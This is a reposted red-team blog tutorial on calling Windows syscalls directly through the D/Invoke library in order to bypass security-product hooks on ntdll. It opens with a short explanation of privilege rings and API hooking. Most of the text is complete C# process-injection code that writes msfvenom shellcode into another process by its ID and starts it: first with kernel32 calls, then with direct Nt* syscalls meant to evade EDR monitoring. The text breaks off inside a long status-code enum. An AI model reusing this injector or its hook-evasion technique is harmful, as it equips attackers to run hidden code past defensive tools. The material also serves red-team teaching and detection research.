Everything posted by Nytro
Syscalls with D/Invoke
Rasta Mouse, Jan 24, 2021, 11 min read
Tags: c#, .net, dinvoke, syscalls, edr

Windows Architecture Primer

x86 processors have 4 privilege levels, known as rings, that control access to memory and CPU operations. They range from Ring 0, the most privileged, to Ring 3.

[Image credit: Wikipedia]

Windows only supports Rings 0 and 3, affectionately known as Kernel and User Mode respectively. The majority of user activity will occur in Ring 3, but applications may cross into Ring 0 when calling a variety of APIs - this is required when accessing the filesystem, for example.

There is also a hierarchy to the native APIs. User applications will generally call "high-level" APIs in kernel32 and user32 etc., and those APIs will call "low-level" APIs in ntdll.

[Image credit: TechNet]

If you're familiar with basic process injection, you will know that APIs such as OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread are often used - all of which live inside kernel32. OpenProcess itself calls NtOpenProcess, which can be observed in a tool such as API Monitor.

Security vendors realised that if they were going to detect and/or block this type of activity, then they would need to hook these APIs. There are different types of hooks that we won't look at in detail here - but think of a hook as a type of man-in-the-middle. Instead of pointing to the real function, an API call is redirected to a vendor-controlled module where it can be inspected and/or dropped.

[Image credit: Practical Malware Analysis]

At first, vendors were only hooking APIs within kernel32, such as OpenProcess. Attackers could circumvent this by calling NtOpenProcess directly (illustrated above), which would effectively bypass the vendor's hook. Vendors obviously started to push back by also hooking the corresponding Nt* functions as well. So where do we go next?

Syscalls

A system call (syscall) is the means by which ntdll transitions to the kernel.
We can "unassemble" NtOpenProcess in WinDBG easily enough to see the instructions.

0:000> u ntdll!NtOpenProcess
ntdll!NtOpenProcess:
00007ffd`8570c460 4c8bd1           mov     r10,rcx
00007ffd`8570c463 b826000000       mov     eax,26h
00007ffd`8570c468 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffd`8570c470 7503             jne     ntdll!NtOpenProcess+0x15 (00007ffd`8570c475)
00007ffd`8570c472 0f05             syscall
00007ffd`8570c474 c3               ret
00007ffd`8570c475 cd2e             int     2Eh
00007ffd`8570c477 c3               ret

There are also excellent syscall lookup tables that we can use as well.

D/Invoke has an excellent method called GetSyscallStub that will read ntdll from disk and find the syscall for a given API.

To demonstrate - this is the API trace of the typical OpenProcess/VirtualAllocEx/WriteProcessMemory/CreateRemoteThread (I've blurred ones that are not directly related to the injection to preserve the clarity of the calls we want to focus on). This was tested with the following code:

using System;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class Program
    {
        // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp
        static readonly byte[] _shellcode = new byte[323] {
            0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
            0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
            0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
            0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
            0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
            0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
            0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
            0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
            0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
            0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
            0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
            0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
            0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
            0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
            0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
            0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
            0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
            0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
            0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
            0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,
            0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,
            0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };

        static void Main(string[] args)
        {
            var hProcess = OpenProcess(
                0x001F0FFF, // PROCESS_ALL_ACCESS
                false,
                int.Parse(args[0]));

            var hRegion = VirtualAllocEx(
                hProcess,
                IntPtr.Zero,
                (uint)_shellcode.Length,
                0x1000 | 0x2000, // MEM_COMMIT | MEM_RESERVE
                0x04);           // PAGE_READWRITE

            WriteProcessMemory(
                hProcess,
                hRegion,
                _shellcode,
                (uint)_shellcode.Length,
                out UIntPtr _);

            VirtualProtectEx(
                hProcess,
                hRegion,
                (UIntPtr)_shellcode.Length,
                0x20, // PAGE_EXECUTE_READ
                out uint _);

            CreateRemoteThread(
                hProcess,
                IntPtr.Zero,
                0,
                hRegion,
                IntPtr.Zero,
                0,
                IntPtr.Zero);
        }

        [DllImport("kernel32.dll")]
        static extern IntPtr OpenProcess(
            int dwDesiredAccess,
            bool bInheritHandle,
            int dwProcessId);

        [DllImport("kernel32.dll")]
        static extern IntPtr VirtualAllocEx(
            IntPtr hProcess,
            IntPtr lpAddress,
            uint dwSize,
            uint flAllocationType,
            uint flProtect);

        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(
            IntPtr hProcess,
            IntPtr lpBaseAddress,
            byte[] lpBuffer,
            uint nSize,
            out UIntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(
            IntPtr hProcess,
            IntPtr lpAddress,
            UIntPtr dwSize,
            uint flNewProtect,
            out uint lpflOldProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(
            IntPtr hProcess,
            IntPtr lpThreadAttributes,
            uint dwStackSize,
            IntPtr lpStartAddress,
            IntPtr lpParameter,
            uint dwCreationFlags,
            IntPtr lpThreadId);
    }
}

We shall now replace the standard P/Invoke with syscalls for each of these APIs.

GetSyscallStub

The first step is to replace the P/Invoke signatures with corresponding delegates targeting the Nt functions. For instance, OpenProcess will be replaced with:

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
delegate NTSTATUS NtOpenProcess(
    ref IntPtr ProcessHandle,
    uint DesiredAccess,
    ref OBJECT_ATTRIBUTES ObjectAttributes,
    ref CLIENT_ID ClientId);

[StructLayout(LayoutKind.Sequential, Pack = 0)]
struct OBJECT_ATTRIBUTES
{
    public int Length;
    public IntPtr RootDirectory;
    public IntPtr ObjectName;
    public uint Attributes;
    public IntPtr SecurityDescriptor;
    public IntPtr SecurityQualityOfService;
}

[StructLayout(LayoutKind.Sequential)]
struct CLIENT_ID
{
    public IntPtr UniqueProcess;
    public IntPtr UniqueThread;
}

(NTSTATUS is a pretty big enum that I've excluded for brevity).

Next, get a pointer to the syscall:

IntPtr stub = Generic.GetSyscallStub("NtOpenProcess");

GetSyscallStub only takes a FunctionName and not a target DLL, since syscalls only exist in ntdll.

Marshal that pointer to the delegate:

NtOpenProcess ntOpenProcess = (NtOpenProcess)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtOpenProcess));

And then call the method:

IntPtr hProcess = IntPtr.Zero;
// InitializeObjectAttributes sets Length to sizeof(OBJECT_ATTRIBUTES); do the same here.
OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES { Length = Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES)) };
CLIENT_ID ci = new CLIENT_ID { UniqueProcess = (IntPtr)uint.Parse(args[0]) };

NTSTATUS result = ntOpenProcess(
    ref hProcess,
    0x001F0FFF, // PROCESS_ALL_ACCESS
    ref oa,
    ref ci);

The return code should be Success and hProcess now contains a value.
result      Success
hProcess    0x00000000000003bc

Final Code

using DInvoke.DynamicInvoke;
using System;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class Program
    {
        // msfvenom -p windows/x64/messagebox EXITFUNC=thread -f csharp
        static readonly byte[] _shellcode = new byte[323] {
            0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
            0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
            0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
            0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
            0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
            0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
            0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
            0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
            0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
            0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
            0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
            0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
            0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
            0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
            0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
            0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
            0x85,0x2b,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
            0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,
            0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,
            0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x48,0x65,0x6c,0x6c,0x6f,
            0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,0x65,0x73,
            0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };

        static void Main(string[] args)
        {
            // NtOpenProcess
            IntPtr stub = Generic.GetSyscallStub("NtOpenProcess");
            NtOpenProcess ntOpenProcess = (NtOpenProcess)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtOpenProcess));

            IntPtr hProcess = IntPtr.Zero;
            // InitializeObjectAttributes sets Length to sizeof(OBJECT_ATTRIBUTES); do the same here.
            OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES { Length = Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES)) };
            CLIENT_ID ci = new CLIENT_ID { UniqueProcess = (IntPtr)uint.Parse(args[0]) };

            NTSTATUS result = ntOpenProcess(
                ref hProcess,
                0x001F0FFF, // PROCESS_ALL_ACCESS
                ref oa,
                ref ci);
            Check(result, "NtOpenProcess");

            // NtAllocateVirtualMemory
            stub = Generic.GetSyscallStub("NtAllocateVirtualMemory");
            NtAllocateVirtualMemory ntAllocateVirtualMemory = (NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtAllocateVirtualMemory));

            IntPtr baseAddress = IntPtr.Zero;
            IntPtr regionSize = (IntPtr)_shellcode.Length; // rounded up to a page by the kernel

            result = ntAllocateVirtualMemory(
                hProcess,
                ref baseAddress,
                IntPtr.Zero,
                ref regionSize,
                0x1000 | 0x2000, // MEM_COMMIT | MEM_RESERVE
                0x04);           // PAGE_READWRITE
            Check(result, "NtAllocateVirtualMemory");

            // NtWriteVirtualMemory
            stub = Generic.GetSyscallStub("NtWriteVirtualMemory");
            NtWriteVirtualMemory ntWriteVirtualMemory = (NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtWriteVirtualMemory));

            var buffer = Marshal.AllocHGlobal(_shellcode.Length);
            Marshal.Copy(_shellcode, 0, buffer, _shellcode.Length);

            IntPtr bytesWritten = IntPtr.Zero;
            result = ntWriteVirtualMemory(
                hProcess,
                baseAddress,
                buffer,
                (IntPtr)_shellcode.Length,
                ref bytesWritten);
            Marshal.FreeHGlobal(buffer);
            Check(result, "NtWriteVirtualMemory");

            // NtProtectVirtualMemory
            stub = Generic.GetSyscallStub("NtProtectVirtualMemory");
            NtProtectVirtualMemory ntProtectVirtualMemory = (NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtProtectVirtualMemory));

            uint oldProtect = 0;
            result = ntProtectVirtualMemory(
                hProcess,
                ref baseAddress,
                ref regionSize,
                0x20, // PAGE_EXECUTE_READ
                ref oldProtect);
            Check(result, "NtProtectVirtualMemory");

            // NtCreateThreadEx
            stub = Generic.GetSyscallStub("NtCreateThreadEx");
            NtCreateThreadEx ntCreateThreadEx = (NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtCreateThreadEx));

            IntPtr hThread = IntPtr.Zero;
            result = ntCreateThreadEx(
                out hThread,
                ACCESS_MASK.MAXIMUM_ALLOWED,
                IntPtr.Zero,
                hProcess,
                baseAddress,
                IntPtr.Zero,
                0,            // CreateFlags: 0 = start immediately
                IntPtr.Zero,  // ZeroBits
                IntPtr.Zero,  // StackSize (0 = default)
                IntPtr.Zero,  // MaximumStackSize (0 = default)
                IntPtr.Zero); // AttributeList
            Check(result, "NtCreateThreadEx");
        }

        // Every Nt* call returns an NTSTATUS; anything other than Success means the
        // injection cannot continue, so stop with the code for diagnosis.
        static void Check(NTSTATUS status, string api)
        {
            if (status != NTSTATUS.Success)
                throw new InvalidOperationException($"{api} failed: {status} (0x{(uint)status:X8})");
        }

        // SIZE_T / PSIZE_T parameters are pointer-sized, so they are declared as IntPtr
        // rather than uint: on x64 the kernel reads and writes 8 bytes for them.

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate NTSTATUS NtOpenProcess(
            ref IntPtr ProcessHandle,
            uint DesiredAccess,
            ref OBJECT_ATTRIBUTES ObjectAttributes,
            ref CLIENT_ID ClientId);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate NTSTATUS NtAllocateVirtualMemory(
            IntPtr ProcessHandle,
            ref IntPtr BaseAddress,
            IntPtr ZeroBits,
            ref IntPtr RegionSize,
            uint AllocationType,
            uint Protect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate NTSTATUS NtWriteVirtualMemory(
            IntPtr ProcessHandle,
            IntPtr BaseAddress,
            IntPtr Buffer,
            IntPtr NumberOfBytesToWrite,      // SIZE_T
            ref IntPtr NumberOfBytesWritten); // PSIZE_T

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate NTSTATUS NtProtectVirtualMemory(
            IntPtr ProcessHandle,
            ref IntPtr BaseAddress,
            ref IntPtr RegionSize,
            uint NewProtect,
            ref uint OldProtect);

        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate NTSTATUS NtCreateThreadEx(
            out IntPtr ThreadHandle,
            ACCESS_MASK DesiredAccess,
            IntPtr ObjectAttributes,
            IntPtr ProcessHandle,
            IntPtr StartRoutine,
            IntPtr Argument,
            uint CreateFlags,        // ULONG; 1 = THREAD_CREATE_FLAGS_CREATE_SUSPENDED
            IntPtr ZeroBits,         // SIZE_T
            IntPtr StackSize,        // SIZE_T
            IntPtr MaximumStackSize, // SIZE_T
            IntPtr AttributeList);

        [StructLayout(LayoutKind.Sequential, Pack = 0)]
        struct OBJECT_ATTRIBUTES
        {
            public int Length;
            public IntPtr RootDirectory;
            public IntPtr ObjectName;
            public uint Attributes;
            public IntPtr SecurityDescriptor;
            public IntPtr SecurityQualityOfService;
        }

        [StructLayout(LayoutKind.Sequential)]
        struct CLIENT_ID
        {
            public IntPtr UniqueProcess;
            public IntPtr UniqueThread;
        }

        [Flags]
        enum ACCESS_MASK : uint
        {
            DELETE = 0x00010000,
            READ_CONTROL = 0x00020000,
            WRITE_DAC = 0x00040000,
            WRITE_OWNER = 0x00080000,
            SYNCHRONIZE = 0x00100000,
            STANDARD_RIGHTS_REQUIRED = 0x000F0000,
            STANDARD_RIGHTS_READ = 0x00020000,
            STANDARD_RIGHTS_WRITE = 0x00020000,
            STANDARD_RIGHTS_EXECUTE = 0x00020000,
            STANDARD_RIGHTS_ALL = 0x001F0000,
            SPECIFIC_RIGHTS_ALL = 0x0000FFFF,
            ACCESS_SYSTEM_SECURITY = 0x01000000,
            MAXIMUM_ALLOWED = 0x02000000,
            GENERIC_READ = 0x80000000,
            GENERIC_WRITE = 0x40000000,
            GENERIC_EXECUTE = 0x20000000,
            GENERIC_ALL = 0x10000000,
            DESKTOP_READOBJECTS = 0x00000001,
            DESKTOP_CREATEWINDOW = 0x00000002,
            DESKTOP_CREATEMENU = 0x00000004,
            DESKTOP_HOOKCONTROL = 0x00000008,
            DESKTOP_JOURNALRECORD = 0x00000010,
            DESKTOP_JOURNALPLAYBACK = 0x00000020,
            DESKTOP_ENUMERATE = 0x00000040,
            DESKTOP_WRITEOBJECTS = 0x00000080,
            DESKTOP_SWITCHDESKTOP = 0x00000100,
            WINSTA_ENUMDESKTOPS = 0x00000001,
            WINSTA_READATTRIBUTES = 0x00000002,
            WINSTA_ACCESSCLIPBOARD = 0x00000004,
            WINSTA_CREATEDESKTOP = 0x00000008,
            WINSTA_WRITEATTRIBUTES = 0x00000010,
            WINSTA_ACCESSGLOBALATOMS = 0x00000020,
            WINSTA_EXITWINDOWS = 0x00000040,
            WINSTA_ENUMERATE = 0x00000100,
            WINSTA_READSCREEN = 0x00000200,
            WINSTA_ALL_ACCESS = 0x0000037F,
            SECTION_ALL_ACCESS = 0x10000000,
            SECTION_QUERY = 0x0001,
            SECTION_MAP_WRITE = 0x0002,
            SECTION_MAP_READ = 0x0004,
            SECTION_MAP_EXECUTE = 0x0008,
            SECTION_EXTEND_SIZE = 0x0010
        };

        [Flags]
        enum NTSTATUS : uint
        {
            // Success
            Success = 0x00000000,
            Wait0 = 0x00000000,
            Wait1 = 0x00000001,
            Wait2 = 0x00000002,
            Wait3 = 0x00000003,
            Wait63 = 0x0000003f,
            Abandoned = 0x00000080,
            AbandonedWait0 = 0x00000080,
            AbandonedWait1 = 0x00000081,
            AbandonedWait2 = 0x00000082,
            AbandonedWait3 = 0x00000083,
            AbandonedWait63 = 0x000000bf,
            UserApc = 0x000000c0,
            KernelApc = 0x00000100,
            Alerted = 0x00000101,
            Timeout = 0x00000102,
            Pending = 0x00000103,
            Reparse = 0x00000104,
            MoreEntries = 0x00000105,
            NotAllAssigned = 0x00000106,
            SomeNotMapped = 0x00000107,
            OpLockBreakInProgress = 0x00000108,
            VolumeMounted = 0x00000109,
            RxActCommitted = 0x0000010a,
            NotifyCleanup = 0x0000010b,
            NotifyEnumDir = 0x0000010c,
            NoQuotasForAccount = 0x0000010d,
            PrimaryTransportConnectFailed = 0x0000010e,
            PageFaultTransition = 0x00000110,
            PageFaultDemandZero = 0x00000111,
            PageFaultCopyOnWrite = 0x00000112,
            PageFaultGuardPage = 0x00000113,
            PageFaultPagingFile = 0x00000114,
            CrashDump = 0x00000116,
            ReparseObject = 0x00000118,
            NothingToTerminate = 0x00000122,
            ProcessNotInJob = 0x00000123,
            ProcessInJob = 0x00000124,
            ProcessCloned = 0x00000129,
            FileLockedWithOnlyReaders = 0x0000012a,
            FileLockedWithWriters = 0x0000012b,

            // Informational
            Informational = 0x40000000,
            ObjectNameExists = 0x40000000,
            ThreadWasSuspended = 0x40000001,
            WorkingSetLimitRange = 0x40000002,
            ImageNotAtBase = 0x40000003,
            RegistryRecovered = 0x40000009,

            // Warning
            Warning = 0x80000000,
            GuardPageViolation = 0x80000001,
            DatatypeMisalignment = 0x80000002,
            Breakpoint = 0x80000003,
            SingleStep = 0x80000004,
            BufferOverflow = 0x80000005,
            NoMoreFiles = 0x80000006,
            HandlesClosed = 0x8000000a,
            PartialCopy = 0x8000000d,
            DeviceBusy = 0x80000011,
            InvalidEaName = 0x80000013,
            EaListInconsistent = 0x80000014,
            NoMoreEntries = 0x8000001a,
            LongJump = 0x80000026,
            DllMightBeInsecure = 0x8000002b,

            // Error
            Error = 0xc0000000,
            Unsuccessful = 0xc0000001,
            NotImplemented = 0xc0000002,
            InvalidInfoClass = 0xc0000003,
            InfoLengthMismatch = 0xc0000004,
            AccessViolation = 0xc0000005,
            InPageError = 0xc0000006,
            PagefileQuota = 0xc0000007,
            InvalidHandle = 0xc0000008,
            BadInitialStack = 0xc0000009,
            BadInitialPc = 0xc000000a,
            InvalidCid = 0xc000000b,
            TimerNotCanceled = 0xc000000c,
            InvalidParameter = 0xc000000d,
            NoSuchDevice = 0xc000000e,
            NoSuchFile = 0xc000000f,
            InvalidDeviceRequest = 0xc0000010,
            EndOfFile = 0xc0000011,
            WrongVolume = 0xc0000012,
            NoMediaInDevice = 0xc0000013,
            NoMemory = 0xc0000017,
            ConflictingAddresses = 0xc0000018,
            NotMappedView = 0xc0000019,
            UnableToFreeVm = 0xc000001a,
            UnableToDeleteSection = 0xc000001b,
            IllegalInstruction = 0xc000001d,
            AlreadyCommitted = 0xc0000021,
            AccessDenied = 0xc0000022,
            BufferTooSmall = 0xc0000023,
            ObjectTypeMismatch = 0xc0000024,
            NonContinuableException = 0xc0000025,
            BadStack = 0xc0000028,
            NotLocked = 0xc000002a,
            NotCommitted = 0xc000002d,
            InvalidParameterMix = 0xc0000030,
            ObjectNameInvalid = 0xc0000033,
            ObjectNameNotFound = 0xc0000034,
            ObjectNameCollision = 0xc0000035,
            ObjectPathInvalid = 0xc0000039,
            ObjectPathNotFound = 0xc000003a,
            ObjectPathSyntaxBad = 0xc000003b,
            DataOverrun = 0xc000003c,
            DataLate = 0xc000003d,
            DataError = 0xc000003e,
            CrcError = 0xc000003f,
            SectionTooBig = 0xc0000040,
            PortConnectionRefused = 0xc0000041,
            InvalidPortHandle = 0xc0000042,
            SharingViolation = 0xc0000043,
            QuotaExceeded = 0xc0000044,
            InvalidPageProtection = 0xc0000045,
            MutantNotOwned = 0xc0000046,
            SemaphoreLimitExceeded = 0xc0000047,
            PortAlreadySet = 0xc0000048,
            SectionNotImage = 0xc0000049,
            SuspendCountExceeded = 0xc000004a,
            ThreadIsTerminating = 0xc000004b,
            BadWorkingSetLimit = 0xc000004c,
            IncompatibleFileMap = 0xc000004d,
            SectionProtection = 0xc000004e,
            EasNotSupported = 0xc000004f,
            EaTooLarge = 0xc0000050,
            NonExistentEaEntry = 0xc0000051,
            NoEasOnFile = 0xc0000052,
            EaCorruptError = 0xc0000053,
            FileLockConflict = 0xc0000054,
            LockNotGranted = 0xc0000055,
            DeletePending = 0xc0000056,
            CtlFileNotSupported = 0xc0000057,
            UnknownRevision = 0xc0000058,
            RevisionMismatch = 0xc0000059,
            InvalidOwner = 0xc000005a,
            InvalidPrimaryGroup = 0xc000005b,
            NoImpersonationToken = 0xc000005c,
            CantDisableMandatory = 0xc000005d,
            NoLogonServers = 0xc000005e,
            NoSuchLogonSession = 0xc000005f,
            NoSuchPrivilege = 0xc0000060,
            PrivilegeNotHeld = 0xc0000061,
            InvalidAccountName = 0xc0000062,
            UserExists = 0xc0000063,
            NoSuchUser = 0xc0000064,
            GroupExists = 0xc0000065,
            NoSuchGroup = 0xc0000066,
            MemberInGroup = 0xc0000067,
            MemberNotInGroup = 0xc0000068,
            LastAdmin = 0xc0000069,
            WrongPassword = 0xc000006a,
            IllFormedPassword = 0xc000006b,
            PasswordRestriction = 0xc000006c,
            LogonFailure = 0xc000006d,
            AccountRestriction = 0xc000006e,
            InvalidLogonHours = 0xc000006f,
            InvalidWorkstation = 0xc0000070,
            PasswordExpired = 0xc0000071,
            AccountDisabled = 0xc0000072,
            NoneMapped = 0xc0000073,
            TooManyLuidsRequested = 0xc0000074,
            LuidsExhausted = 0xc0000075,
            InvalidSubAuthority = 0xc0000076,
            InvalidAcl = 0xc0000077,
            InvalidSid = 0xc0000078,
            InvalidSecurityDescr = 0xc0000079,
            ProcedureNotFound = 0xc000007a,
            InvalidImageFormat = 0xc000007b,
            NoToken = 0xc000007c,
            BadInheritanceAcl = 0xc000007d,
            RangeNotLocked = 0xc000007e,
            DiskFull = 0xc000007f,
            ServerDisabled = 0xc0000080,
            ServerNotDisabled = 0xc0000081,
            TooManyGuidsRequested = 0xc0000082,
            GuidsExhausted = 0xc0000083,
            InvalidIdAuthority = 0xc0000084,
            AgentsExhausted = 0xc0000085,
            InvalidVolumeLabel = 0xc0000086,
            SectionNotExtended = 0xc0000087,
            NotMappedData = 0xc0000088,
            ResourceDataNotFound = 0xc0000089,
            ResourceTypeNotFound = 0xc000008a,
            ResourceNameNotFound = 0xc000008b,
            ArrayBoundsExceeded = 0xc000008c,
            FloatDenormalOperand = 0xc000008d,
            FloatDivideByZero = 0xc000008e,
            FloatInexactResult = 0xc000008f,
            FloatInvalidOperation = 0xc0000090,
            FloatOverflow = 0xc0000091,
            FloatStackCheck = 0xc0000092,
            FloatUnderflow = 0xc0000093,
            IntegerDivideByZero = 0xc0000094,
            IntegerOverflow = 0xc0000095,
            PrivilegedInstruction = 0xc0000096,
            TooManyPagingFiles = 0xc0000097,
            FileInvalid = 0xc0000098,
            InsufficientResources = 0xc000009a,
            InstanceNotAvailable = 0xc00000ab,
            PipeNotAvailable = 0xc00000ac,
            InvalidPipeState = 0xc00000ad,
            PipeBusy = 0xc00000ae,
            IllegalFunction = 0xc00000af,
            PipeDisconnected = 0xc00000b0,
            PipeClosing = 0xc00000b1,
            PipeConnected = 0xc00000b2,
            PipeListening = 0xc00000b3,
            InvalidReadMode = 0xc00000b4,
            IoTimeout = 0xc00000b5,
            FileForcedClosed = 0xc00000b6,
            ProfilingNotStarted = 0xc00000b7,
            ProfilingNotStopped = 0xc00000b8,
            NotSameDevice = 0xc00000d4,
            FileRenamed = 0xc00000d5,
            CantWait = 0xc00000d8,
            PipeEmpty = 0xc00000d9,
            CantTerminateSelf = 0xc00000db,
            InternalError = 0xc00000e5,
            InvalidParameter1 = 0xc00000ef,
            InvalidParameter2 = 0xc00000f0,
            InvalidParameter3 = 0xc00000f1,
            InvalidParameter4 = 0xc00000f2,
            InvalidParameter5 = 0xc00000f3,
            InvalidParameter6 = 0xc00000f4,
            InvalidParameter7 = 0xc00000f5,
            InvalidParameter8 = 0xc00000f6,
            InvalidParameter9 = 0xc00000f7,
            InvalidParameter10 = 0xc00000f8,
            InvalidParameter11 = 0xc00000f9,
            InvalidParameter12 = 0xc00000fa,
            ProcessIsTerminating = 0xc000010a,
            MappedFileSizeZero = 0xc000011e,
            TooManyOpenedFiles = 0xc000011f,
            Cancelled = 0xc0000120,
            CannotDelete = 0xc0000121,
            InvalidComputerName = 0xc0000122,
            FileDeleted = 0xc0000123,
            SpecialAccount = 0xc0000124,
            SpecialGroup = 0xc0000125,
            SpecialUser = 0xc0000126,
            MembersPrimaryGroup = 0xc0000127,
            FileClosed = 0xc0000128,
            TooManyThreads = 0xc0000129,
            ThreadNotInProcess = 0xc000012a,
            TokenAlreadyInUse = 0xc000012b,
            PagefileQuotaExceeded = 0xc000012c,
            CommitmentLimit = 0xc000012d,
            InvalidImageLeFormat = 0xc000012e,
            InvalidImageNotMz = 0xc000012f,
            InvalidImageProtect = 0xc0000130,
            InvalidImageWin16 = 0xc0000131,
            LogonServer = 0xc0000132,
            DifferenceAtDc = 0xc0000133,
            SynchronizationRequired = 0xc0000134,
            DllNotFound = 0xc0000135,
            IoPrivilegeFailed = 0xc0000137,
            OrdinalNotFound = 0xc0000138,
            EntryPointNotFound = 0xc0000139,
            ControlCExit = 0xc000013a,
            InvalidAddress = 0xc0000141,
            PortNotSet = 0xc0000353,
            DebuggerInactive = 0xc0000354,
            CallbackBypass = 0xc0000503,
